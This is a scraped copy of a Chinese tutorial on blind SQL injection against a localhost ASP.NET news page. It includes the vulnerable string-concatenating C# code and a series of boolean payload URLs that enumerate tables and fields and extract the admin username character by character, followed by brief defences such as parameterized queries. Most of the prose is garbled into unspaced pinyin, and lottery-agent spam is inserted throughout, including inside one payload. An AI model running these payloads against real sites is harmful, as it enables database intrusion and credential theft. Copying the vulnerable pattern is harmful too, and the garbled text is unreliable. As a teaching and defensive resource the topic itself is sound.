荣耀彩票代理

  • 热门专题

WEB 安全之 SQL注入<一> 盲注

作者:超期服役  发布日期:2016-12-19 20:31:54
  •     SQLZHURUSHIYIGEBIJIAO“GULAO”DEHUATI,SUIRANXIANZAICUNZAIZHEIZHONGLOUDONGDEZHANDIANBIJIAOSHAOLE,WOMENHAISHIYOUBIYAOLEJIEYIXIATADEWEIHAI,JIQICHANGYONGDESHOUDUAN,ZHIJIZHIBIFANGNENGBAIZHANBUDAI。JINGONGYUFANGSHOUXIANGDANGYUMAOHEDUNDEGUANXI,WOMENRUGUONENGQINGCHULEJIE

    GONGJIDEQUANGUOCHENG,JIUKEYIGENGHAODEYUFANGLEISIQINGKUANGDECHUXIAN。

     SQL注入原理   主要是攻击者,利益被攻击页面的一些漏洞(通常都是程序员粗心大意造成的),改变数据库执行的SQL语句,从而达到获取“非授权信息”的目的。

        XIAMIANZIJIDAJIANLESHIYANHUANJINGYONGYUCESHI。  SHOUXIANJIAODAIYIXIA,CESHIHUANJING KAIFAYUYANWEI Asp.net  ,SHUJUKUSHIYONGDE MSQL ,CESHIYEMIANMONILEPUTONGDEXINWENYEMIAN,URLLIJIESHOUCANSHU ?id=1  HUOQUWENZHANGID,

    荣耀彩票代理HOUTAIZHIJIETONGHUOQUDEIDPINJIECHAXUNYUJU,MEIYOUZUOMINGANZIFUDEGUOLV,CONGERWEIRUQINZHELIUXIALEYOUJIKESHENGDELOUDONG.XIAMIANSHIHOUTAIDAIMA:

        public partial class NewsInfo : System.Web.UI.Page
        {
            protected NewsModel _news = new NewsModel();
            protected void Page_Load(object sender, EventArgs e)
            {
                var id = Request['id'];
                var sqlStr = 'select * from news where id=' + id;
                var sqlCon = SqlHelper.GetConnection();
    
                try
                {
                    var ds = SqlHelper.ExecuteDataset(sqlCon, CommandType.Text, sqlStr);
    
                    if (ds.Tables[0].Rows.Count <= 0) return;
    
                    _news.Title = ds.Tables[0].Rows[0]['title'].ToString();
                    _news.Text = ds.Tables[0].Rows[0]['text'].ToString();
                    _news.CreateTime = ((DateTime)ds.Tables[0].Rows[0]['createTime']).ToString('yyyy-MM-dd');
                }
                catch (Exception ex)
                {
    
                }
            }
        }

       一、过程重现

      

     1. CESHIYOUMEIYOUZHURULOUDONG 

          浏览器荣耀彩票代理输入 http://localhost:2003/newsInfo?id=1  and 1=1    页面正常   后台执行的SQL语句为:select * from news where id=1 and 1=1

    荣耀彩票代理  SHURU http://localhost:2003/newsInfo?id=1  and 1=2  KONGBAIYEMIAN,SHUJUWUFAXIANSHI(HOUTAIZHIXINGDESQLYUJUWEI:select * from news where id=1 and 1=2),YEMIANYOUZHURULOUDONG。

     

    2.  CAIJIESHUJUKUBIAOMING

    荣耀彩票代理    JIRANYOULOUDONG,JIUZHUNBEIZUODIANSHIQINGGE,ZHUYAOMUDESHINADAOHOUTAIGUANLIYUANMIMA,XIANKANKANSHUJUKULIYOUNAXIEBIAOBA

    荣耀彩票代理  http://localhost:2003/newsInfo?id=1 and (select count(*) from userInfo) >=0   MEIYOUSHUJU,JIXUCAIJIE...... NCI,

    荣耀彩票代理 ZHONGYU http://localhost:2003/newsInfo?id=1 and (select count(*) from [user]) >=0

     ZHEILISHILIYONG HOUMIANDETIAOJIANCHAXUNSHUJUKUBIAO,RUGUOBIAOBUCUNZAI,HOUTAIJIUBAOCUOLE,BENCESHISHILIHOUTAIDUIYICHANGZUOLECHULI,DANSHISHUJUKENDINGSHICHUBULAIDE。

    荣耀彩票代理SHUJUXIANSHIZHENGCHANG,SHUOMINGBIAO user CUNZAI,PANDUAN WEI YONGHUBIAO

    3. BIAOZIDUANCAIJIE

    http://localhost:2003/newsInfo?id=1 and (select count(password荣耀彩票代理) from [user]) >=0  ....... N次

    http://localhost:2003/newsInfo?id=1 and (select count(pwd) from [user]) >=0  YEMIANSHUJUZHENGCHANGRUXIATU

    荣耀彩票代理SHUOMINGBIAO user CUNZAI pwd ZIDUAN

    TONGLI  QUERENBIAO user LICUNZAI  name ZIDUAN。

    4. CHAXUNBIAOLIYOUDUOSHAOTIAOSHUJU 

    荣耀彩票代理http://localhost:2003/newsInfo?id=1 and (select count(*) from [user]) >=5 FANHUIKONGBAIYEMIAN

    http://localhost:2003/newsInfo?id=1 and (select count(*) from [user]) >=2 FANHUIKONGBAIYEMIAN

    http://localhost:2003/newsInfo?id=1 and (select count(*) from [user]) =1  YEMIANZHENGCHANG  ,ZHIYOUYIGEYONGHU。

    5. YONGHUMINGCAIJIE

       <A>  YONGHUMINGZHANGDU,

    荣耀彩票代理             http://localhost:2003/newsInfo?id=1 and (select len(name) from [user]) =3  ,FANHUIKONGBAIYEMIAN

                 http://localhost:2003/newsInfo?id=1 and (select len(name) from [user]) =4 ,FANHUIKONGBAIYEMIAN

                 http://localhost:2003/newsInfo?id=1 and (select len(name) from [user]) =5  ,FANHUIZHENGCHANGYEMIAN,QUEDINGYONGHUMINGWEI5WEIZIFU

    <B>  YONGHUMINGCAIJIE

    荣耀彩票代理         DIYIWEI    http://localhost:2003/newsInfo?id=1 and (select ASCII(SUBSTRING(name,1,1)) from [user])> 20 ,FANHUIZHENGCHANGYEMIAN ........... 

                         XIAMIANCAIJIE NCI

             http://localhost:2003/newsInfo?id=1 and (select ASCII(SUBSTRING(name,1,1)) from [user])> 96, FANHUIZHENGCHANGYEMIAN

    荣耀彩票代理                      http://localhost:2003/newsInfo?id=1 and (select ASCII(SUBSTRING(name,1,1)) from [user])> 97   FANHUIKONGBAIYEMIANLE

                           ZHEISHUOMING DIYIWEI ASCIIZHIWEI 97,DUIYINGZIMU a

    荣耀彩票代理          YICILEITUI ,DI2WEI,DI3WEI .....DI5WEI, CAIJIECHUYONGHUMING admin ,ZAIZHEILIZHUYAOYONGLE ASCII  HE SUBSTRING HANSHU,RUGUODUIZHEILIANGGEHANSHUBUSHUXIQINGZIXINGBAIDU,XIAMIANSHICAIJIEGUOCHENGJIETU。

          

    YONGHUMINGCAIJIECHENGGONG。

    6. MIMACAIJIE

        YONGHUMINGGAODINGLE,MIMASILUYESHIYIYANG

        <A> XIANQUEDINGMIMAZHANGDU

    荣耀彩票代理    <B> ZHUGEMIMACAIJIE,ZHEILIJIUBUXIEZHURUDEsqlYUJULE,TONG YONGHUMING CAIJIE

       ZHICI,ZHENGGAIWANGZHANGUANLIHOUTAILUNXIAN。

    二、防范方法

       1. HOUTAIJINXINGSHURUYANZHENG,DUIMINGANZIFUGUOLV。(MOUQINGKUANGXIABUWANQUANBAOXIAN,KENENGHUIYOULOUDIAODEMINGANZIFU,GONGJIZHEKEYIDUIGUANJIANZIFUZHUANYIRAOGUOGUOLV)

     2. SHIYONGCUNCHUGUOCHENG(BULINGHUO,TAIDUOCUNCHUGUOCHENGBUHAOWEIHU,TEBIESHIRUGUOCUNCHUGUOCHENGLISHEJIDAOYEWU,DUIYIHOUDEWEIHUJIANZHISHIZAINAN,CHULEWENTIYEBUHAOCHAZHAO)

       3. SHIYONGCANSHUHUACHAXUN,NENGBIMIANPINJIESQL,JIUBUYAOPINJIESQLYUJU。(DANGRANLE,BENSHILIZHIYAOPANDUAN CANSHUID SHIFOUWEISHUZIJIUBUHUIYOUTILE)

About IT165 - 广告服务 - 隐私声明 - 版权申明 - 免责条款 - 网站地图 - 网友投稿 - 联系方式
本站内容来自于互联网,仅供用于网络技术学习,学习中请遵循相关法律法规